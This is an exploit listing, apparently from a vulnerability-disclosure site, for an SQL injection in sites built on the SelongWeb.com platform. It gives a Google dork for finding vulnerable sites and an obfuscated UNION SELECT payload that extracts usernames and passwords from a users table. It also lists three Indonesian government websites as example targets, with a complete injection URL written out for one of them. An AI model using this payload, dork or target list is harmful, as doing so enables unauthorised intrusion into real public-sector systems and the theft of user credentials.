Powered By SelongWeb.com - SQL INJECTION

2021.06.06
id KimiHmei7 (ID) id
Risk: Medium
Local: Yes
Remote: Yes
CVE: -
CWE: -

Exploit Title : Powered By SelongWeb.com - SQL INJECTION # Vendor Homepage : https://selongweb.com # Discovered By: KimiHmei7 # Author Homepage: https://tegalsec.org # Google Dork: inurl:/statis- "SelongWeb.Com" #Exploit '/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+ # Example Target https://dukcapil.baritokualakab.go.id/statis-1-profil.html https://dukcapil.lomboktimurkab.go.id/statis-20-profil.html https://bkpsdm.lomboktimurkab.go.id/statis-3-profil.html Example Injection ~ https://dukcapil.baritokualakab.go.id/statis-1-profil'/*!50000union*/+/*!50000select*/+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+.html Tegal1337 - Family Attack Cyber.


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top